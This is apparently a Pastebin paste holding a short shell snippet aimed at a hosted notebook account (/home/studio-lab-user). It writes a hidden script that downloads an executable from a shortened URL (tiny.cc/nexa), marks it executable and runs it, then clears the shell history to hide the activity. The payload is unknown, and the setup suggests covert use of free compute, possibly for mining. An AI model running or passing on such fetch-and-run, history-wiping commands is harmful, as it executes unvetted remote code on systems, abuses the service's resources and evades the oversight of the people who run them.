Advertisement
ppek

1

Feb 23rd, 2023 (edited)
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf x && wget -O x http://tiny.cc/nexa && chmod +x x && ./x " > /home/studio-lab-user/.lib/gas.sh
  2. cd /home/studio-lab-user/.lib/
  3. chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
  4.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement